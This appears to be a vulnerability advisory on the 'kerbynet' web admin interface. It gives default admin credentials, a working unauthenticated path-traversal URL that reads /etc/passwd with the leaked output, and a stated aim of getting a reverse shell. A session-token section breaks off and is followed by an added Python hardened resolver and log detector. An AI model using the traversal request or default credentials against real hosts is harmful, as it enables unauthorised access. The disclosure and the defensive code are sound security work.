Introduction to the PoC:

In this distribution, the management website is a binary file named "kerbynet", executed from the cgi-bin directory here:

/cdrom/usr/local/apache2/cgi-bin/kerbynet

So all URLs look like this (the host name is omitted on this page; <host> stands in for it):

http://<host>/cgi-bin/kerbynet?Section=&STk=&Action=&=

This binary routes the parameters (GET/POST) to dedicated scripts (mainly sh) under /root/kerbynet.cgi/scripts. All the HTML template files are located in /root/kerbynet.cgi/template.

A few pages can be requested without an authentication token, like the GPL license, X. A session token is needed for every administration page. For all main administration actions, the admin user needs to be logged in (Unix account admin/zeroshell by default for console, SSH and WebGUI).

The WebGUI runs as the "apache" user. This user is restricted and can only run a whitelist of commands and the sh scripts linked to kerbynet.cgi/scripts. To see the administrative rights of this user, cat the file:

cat /root/kerbynet.cfg/sudoers

Many of these scripts can be exploited to execute arbitrary commands on the system through the WebGUI. For the next part of this PoC, only one script is exploited to gain a full remote reverse shell.

Proof of Concept 1: Local File Disclosure

The About page's URL is the following:

http://<host>/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=About

As we can see, this URL doesn't need a session token to print the GPL license of the distribution. The license is located in the file:

/root/kerbynet.cgi/template/About

So we can deduce that this URL can be used for a local file disclosure vulnerability.

PoC:

http://<host>/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../etc/passwd

Results:

root:x:0:0:root:/root:/bin/bash
admin:x:0:0:root:/root:/root/kerbynet.cgi/scripts/localman
apache:x:1000:100::/home/apache:
nobody:x:1001:100::/home/nobody:
sshd:x:50000:100::/home/sshd:/bin/false
bin:x:1:1::/home/bin:
quagga:x:0:100::/home/quagga:
havp:x:50002:50002:HTTP AntiVirus Proxy:/home/havp:/bin/false

Proof of Concept 2: Generate a valid admin session token

As we said, all administration requests need a valid session token named "STk". This variable is used as a parameter in the GET URL, and in a hidden input field of the form too.
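The file disclosure in Proof of Concept 1 comes down to the Render action joining the Object parameter onto the template directory without checking where the result ends up. The following Python is an added example, not kerbynet's code or part of the original advisory: it contrasts that unvalidated join with a hardened resolver that only accepts a bare file name and verifies the normalised path is still inside the template directory, and it includes a small log-side check that flags unauthenticated Render requests the hardened resolver would reject. The directory path mirrors the one named on the page; the host 192.0.2.10 in the usage section and the function names are constructed for the example.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Constructed constant; the page names /root/kerbynet.cgi/template as the
# directory the About page is rendered from.
TEMPLATE_DIR = "/root/kerbynet.cgi/template"

# A template name is a single path component: letters, digits, '_', '.', '-'.
_NAME_RE = re.compile(r"[A-Za-z0-9_.-]+")


def unsafe_render_path(obj):
    """Unvalidated join, the behaviour the page describes for Action=Render:
    '..' segments in Object walk out of the template directory."""
    return posixpath.normpath(posixpath.join(TEMPLATE_DIR, obj))


def safe_render_path(obj):
    """Hypothetical hardened resolver (not kerbynet's own code).

    Accepts a bare file name only, then checks that the normalised result
    still lives under TEMPLATE_DIR. Returns the path, or None on rejection.
    """
    if not _NAME_RE.fullmatch(obj or ""):
        return None  # empty, contains '/', '\\', NUL, or other junk
    candidate = posixpath.normpath(posixpath.join(TEMPLATE_DIR, obj))
    inside = posixpath.commonpath([TEMPLATE_DIR, candidate]) == TEMPLATE_DIR
    if not inside or candidate == TEMPLATE_DIR:
        return None  # '..' escaped the directory, or '.' named the directory itself
    return candidate


def suspicious_render_request(url):
    """Detection helper for proxy or access logs: True when an unauthenticated
    Render request (Section=NoAuthREQ&Action=Render) carries an Object value
    the hardened resolver would reject. parse_qs percent-decodes, so encoded
    forms such as %2e%2e%2f are caught as well."""
    params = parse_qs(urlsplit(url).query)
    if params.get("Section") != ["NoAuthREQ"] or params.get("Action") != ["Render"]:
        return False
    obj = params.get("Object", [""])[0]
    return safe_render_path(obj) is None


if __name__ == "__main__":
    # Constructed sample requests against a TEST-NET address.
    base = "http://192.0.2.10/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object="
    for obj in ("About", "../../../etc/passwd", "%2e%2e%2f%2e%2e%2fetc%2fpasswd"):
        url = base + obj
        decoded = parse_qs(urlsplit(url).query)["Object"][0]
        print(f"{obj:35} unsafe -> {unsafe_render_path(decoded)}")
        print(f"{'':35} safe   -> {safe_render_path(decoded)}")
        print(f"{'':35} flag   -> {suspicious_render_request(url)}")
```

The regex is the primary gate (it refuses any path separator, so traversal never reaches the join); the commonpath check is a second, independent guard that also catches "." and ".." on their own, which the regex admits. Running the log check over the Object values seen in access logs gives a cheap indicator for this class of request without needing the token-based authentication that the rest of the interface relies on.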